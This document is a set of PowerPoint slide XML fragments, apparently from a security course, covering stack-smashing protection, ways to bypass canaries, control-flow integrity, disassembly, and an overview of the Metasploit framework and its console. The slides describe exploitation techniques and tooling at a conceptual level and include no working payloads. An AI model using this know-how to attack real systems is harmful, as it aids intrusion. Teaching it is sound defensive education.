              <a:t> or Stack Smashing Protector (SSP), since version 4.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-protector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-protector-all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ProPolice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> combines canaries with a stack layout that minimizes the chances of being exploitable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rearranges memory so that arrays cannot be used to overwrite local variables (e.g., a function pointer)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Arguments cannot be rearranged, and therefore function pointer arguments are copied into local variables and then the local reference is used within the code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See “Protecting from stack-smashing attacks” by Hiroaki </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Etoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kunikazu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Yoda </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167921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866" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bypassing Canaries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1188867" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Canaries can be bypassed by overflowing a pointer used as a destination of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()-like function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can overwrite the return address without touching the canary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The XOR canary was introduced to protect from this attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pointers in the function frame can still be overwritten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This require knowledge of the process memory layout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note: Window implements similar protection using the /GS compiler option</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BROP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blind Return Oriented Programming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.scs.stanford.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>brop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31370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8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88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88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888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888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888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888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8886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888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Exploitation Harder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>New Technology: Control Flow Integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control-Flow Integrity: Principles, Implementation and Applications by M. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Abadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> et al., CCS 2005</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="141590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Flow Integrity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Programs have a control-flow graph (CFG)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic blocks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Direct or indirect control transfers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory corruption attacks often result in execution paths that do not exist in the CFG </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control Flow Integrity (CFI) enforces that execution follows the CFG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An application is analyzed at compile time and its CFG is derived</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The application is then instrumented in order to check that, at run-time, the control transfer follow the established CFG</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83709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Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a framework to support exploitation and remote code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Developed in 2003 (in Perl) by HD Moore, was rewritten in Ruby</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> was acquired by Rapid7 in 2009</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85358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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Distributions/Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Framework Edition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The basic framework (free)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Community Edition </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provides a web-based interface to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (free)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Express/Pro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Commercial version of the tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Armitage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Graphic management interface on top of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that support collaboration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="104619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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on Kali Linux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kali Linux is a Linux distribution that focuses on security and vulnerability analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It comes with a number of pre-installed security tools, including </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105349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Process </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Choose a vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Choose a payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Choose an encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute the exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8137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Disassembling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disassembling is the process of extracting the assembly representation of a program by analyzing its binary representation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disassemblers can be:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linear: linearly parse the instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recursive: attempt to follow the flow of the program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184395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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interactive shell for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfcli</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command line interface for scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfpayload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Payload generation utility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfencode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encoding utility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nasm_shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assembly manipulation shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1873571785"/>
      </p:ext>
    </p:extLst>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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Modules</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modules are sub-components that can be leveraged to carry out specific tasks (e.g., scanning for a service)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> provides dozens of modules, including</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Admin: HTTP, MSSQL, MySQL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Postgres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, VMware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scanning: DCERPC, Discovery, FTP, HTTP, IMAP, MSSQL, MySQL, NetBIOS, POP3, SMB, SMTP, SNMP, SSH, Telnet, TFTP, VMware, VNC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server: FTP, IMAP, POP, SMB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="568274534"/>
      </p:ext>
    </p:extLst>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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Console</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command is the most common way to access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Payload caught by AV? Fly under the radar with Dynamic Payloads in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> Pro -- learn more on http://rapid7.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>       =[ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> v4.11.4-2015071403                   ]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>+ -- --=[ 1467 exploits - 840 auxiliary - 232 post        ]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>+ -- --=[ 432 payloads - 37 encoders - 8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>nops</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>             ]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>+ -- --=[ Free </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> Pro trial: http://r-7.co/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>trymsp</a:t>
            </a:r>
            <a:r>
